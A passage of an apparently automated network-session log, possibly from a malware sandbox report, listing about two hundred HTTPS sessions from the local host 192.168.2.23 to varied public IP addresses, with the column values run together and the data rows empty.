                                            13689192.168.2.234550212.133.241.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13690192.168.2.2348892145.136.76.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13691192.168.2.234231895.106.18.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13692192.168.2.235963890.7.174.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13693192.168.2.2335408204.111.194.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13694192.168.2.234934038.103.21.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13695192.168.2.235028045.85.202.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13696192.168.2.2335260143.36.14.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13697192.168.2.23385361.116.101.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13698192.168.2.2338548142.42.253.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13699192.168.2.235118279.82.57.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13700192.168.2.2345470149.234.184.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13701192.168.2.2343134126.123.112.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13702192.168.2.23481104.87.147.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13703192.168.2.2333536217.90.135.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13704192.168.2.2341378205.181.144.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13705192.168.2.233670299.43.250.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13706192.168.2.235492051.167.111.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13707192.168.2.235111461.196.199.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13708192.168.2.2347586113.186.120.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13709192.168.2.2342412211.216.220.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13710192.168.2.2341814186.116.20.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13711192.168.2.2360434182.154.235.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13712192.168.2.2341622158.231.204.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13713192.168.2.2333374198.14.39.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13714192.168.2.2342072197.82.93.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13715192.168.2.2354872118.85.227.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13716192.168.2.2338944109.8.233.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13717192.168.2.235300417.130.136.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13718192.168.2.2357638218.155.63.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13719192.168.2.2352124139.72.216.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13720192.168.2.235380073.39.240.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13721192.168.2.2340106195.70.181.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13722192.168.2.2343984140.153.117.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13723192.168.2.2333180157.167.130.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13724192.168.2.234016476.139.121.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13725192.168.2.2333876171.116.108.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13726192.168.2.2343604158.197.135.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13727192.168.2.233990485.115.247.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13728192.168.2.2350492173.242.220.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13729192.168.2.2355754180.97.96.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13730192.168.2.2343718179.85.103.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13731192.168.2.234026439.133.35.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13732192.168.2.234946624.102.249.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13733192.168.2.2341408167.27.83.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13734192.168.2.235924425.171.241.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13735192.168.2.2347580158.246.240.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13736192.168.2.2335696187.210.39.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13737192.168.2.2357760168.86.166.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13738192.168.2.2352574108.205.186.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13739192.168.2.2359826209.173.55.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13740192.168.2.233278079.206.211.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13741192.168.2.2348764106.129.22.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13742192.168.2.235190060.160.216.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13743192.168.2.235705890.71.200.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13744192.168.2.2340386122.199.179.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13745192.168.2.233901645.131.234.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13746192.168.2.235791661.143.117.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13747192.168.2.2348802142.6.163.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13748192.168.2.2347548205.177.221.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13749192.168.2.233533477.214.24.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13750192.168.2.2344172100.159.234.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13751192.168.2.23406944.87.11.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13752192.168.2.23352084.169.91.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13753192.168.2.2339604187.165.92.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13754192.168.2.235425097.127.214.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13755192.168.2.2359666112.243.8.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13756192.168.2.233427295.91.60.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13757192.168.2.2346004104.253.74.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13758192.168.2.2334798138.18.74.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13759192.168.2.2347342218.186.66.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13760192.168.2.2344250150.78.167.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13761192.168.2.235592427.97.79.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13762192.168.2.233937412.154.73.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13763192.168.2.2347228128.204.57.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13764192.168.2.234710014.74.115.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13765192.168.2.2344904107.33.164.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13766192.168.2.233377239.184.35.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13767192.168.2.2357564116.230.38.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13768192.168.2.2351484122.26.226.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13769192.168.2.2346768145.170.113.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13770192.168.2.234436471.55.213.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13771192.168.2.2353654177.255.135.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13772192.168.2.2350368190.104.8.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13773192.168.2.2345884177.185.107.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13774192.168.2.233536472.57.167.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13775192.168.2.2346632155.155.42.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13776192.168.2.234673023.81.57.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13777192.168.2.2354488179.135.178.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13778192.168.2.23508249.243.44.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13779192.168.2.2350730118.125.154.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13780192.168.2.2344276201.233.206.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13781192.168.2.233447482.241.209.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13782192.168.2.2350258199.70.173.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13783192.168.2.2341036145.12.110.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13784192.168.2.2346968185.216.159.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13785192.168.2.2357322222.59.224.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13786192.168.2.2339840201.146.2.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13787192.168.2.2355688102.127.217.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13788192.168.2.235592668.163.168.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13789192.168.2.235521272.48.145.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13790192.168.2.2342974154.214.24.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13791192.168.2.235616250.149.70.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13792192.168.2.2343034104.175.166.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13793192.168.2.2338370179.66.215.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13794192.168.2.2341560213.96.176.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13795192.168.2.2340332146.205.160.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13796192.168.2.234037638.132.119.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13797192.168.2.2334748192.215.230.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13798192.168.2.2336676148.212.113.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13799192.168.2.2335304219.62.60.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13800192.168.2.2338296106.46.142.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13801192.168.2.2343878212.50.181.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13802192.168.2.2355410147.87.215.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13803192.168.2.2357002221.48.26.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13804192.168.2.2353478131.163.202.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13805192.168.2.235620680.89.31.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13806192.168.2.234125077.239.90.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13807192.168.2.2353420205.75.141.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13808192.168.2.233757899.19.26.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13809192.168.2.2342320110.115.2.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13810192.168.2.2340672141.181.212.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13811192.168.2.2352996204.37.202.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13812192.168.2.235153264.16.164.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13813192.168.2.2339590128.15.205.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13814192.168.2.2342808105.203.173.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13815192.168.2.2332776185.91.121.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13816192.168.2.2347170200.149.238.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13817192.168.2.2358404197.202.102.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13818192.168.2.23547548.167.251.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13819192.168.2.233287661.207.176.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13820192.168.2.2355354205.222.53.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13821192.168.2.234264872.60.230.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13822192.168.2.2348908217.97.228.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13823192.168.2.2343100213.180.117.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13824192.168.2.235681878.47.39.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13825192.168.2.2345060163.34.32.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13826192.168.2.2333026141.5.98.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13827192.168.2.235616460.218.44.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13828192.168.2.2345314152.192.44.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13829192.168.2.23557084.237.25.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13830192.168.2.2342248187.193.251.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13831192.168.2.2353702131.27.5.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13832192.168.2.2359292146.169.124.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13833192.168.2.2341320166.154.121.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13834192.168.2.2347528207.137.117.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13835192.168.2.235611636.207.40.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13836192.168.2.2351670194.65.13.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13837192.168.2.234263469.88.98.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13838192.168.2.234009068.76.92.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13839192.168.2.235099691.198.187.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13840192.168.2.235422662.11.229.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13841192.168.2.2350576116.78.5.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13842192.168.2.2360218173.140.252.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13843192.168.2.2353784216.184.175.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13844192.168.2.235198249.110.204.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13845192.168.2.2346100163.111.192.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13846192.168.2.2343556219.237.41.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13847192.168.2.235758084.186.142.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13848192.168.2.2354908216.236.28.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13849192.168.2.2352366101.213.91.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13850192.168.2.2345812173.202.205.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13851192.168.2.2346356196.139.87.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13852192.168.2.234143879.0.170.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13853192.168.2.2360936112.150.101.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13854192.168.2.2358464159.225.216.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13855192.168.2.2340830197.248.202.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13856192.168.2.234512892.215.216.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13857192.168.2.2357816120.185.118.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13858192.168.2.2348136113.66.13.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13859192.168.2.2347244132.205.89.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13860192.168.2.2333484171.235.126.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13861192.168.2.234449834.127.135.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13862192.168.2.2333822208.197.211.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13863192.168.2.2334964120.200.135.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13864192.168.2.235544225.194.166.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13865192.168.2.235514860.73.50.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13866192.168.2.235915018.48.216.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13867192.168.2.2342150213.179.168.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13868192.168.2.2346470206.205.228.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13869192.168.2.2357596116.212.197.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13870192.168.2.234911425.245.152.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13871192.168.2.2352186140.137.118.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13872192.168.2.2333090191.242.175.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13873192.168.2.234370644.171.191.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13874192.168.2.235210285.242.210.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13875192.168.2.234728081.124.193.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13876192.168.2.2347206183.23.189.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13877192.168.2.2349374105.188.183.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13878192.168.2.2360716179.123.32.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13879192.168.2.2342186154.122.237.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13880192.168.2.2339292119.221.254.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13881192.168.2.2342428189.76.224.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13882192.168.2.2357866194.191.226.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13883192.168.2.2352362208.250.210.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13884192.168.2.2348094128.226.236.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13885192.168.2.2353780205.141.79.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13886192.168.2.235847643.10.207.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13887192.168.2.23449244.163.218.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13888192.168.2.2351904150.153.156.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13889192.168.2.233981634.140.223.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13890192.168.2.2342524121.122.205.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13891192.168.2.2352684113.14.253.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13892192.168.2.2340034147.208.228.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13893192.168.2.2334104109.248.148.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13894192.168.2.235177479.174.170.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13895192.168.2.234057276.35.31.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13896192.168.2.2346254132.65.185.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13897192.168.2.2357704100.178.174.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13898192.168.2.2352276154.249.91.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13899192.168.2.2350748151.141.57.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13900192.168.2.2360822141.27.70.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13901192.168.2.235997653.234.189.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13902192.168.2.23571664.179.124.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13903192.168.2.2356344136.75.148.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13904192.168.2.234386440.241.49.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13905192.168.2.234504412.123.48.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13906192.168.2.234445214.196.129.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13907192.168.2.2340906196.73.232.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13908192.168.2.235868250.10.253.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13909192.168.2.235188269.135.37.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13910192.168.2.235290697.24.65.64443
                                            TimestampBytes transferredDirectionData


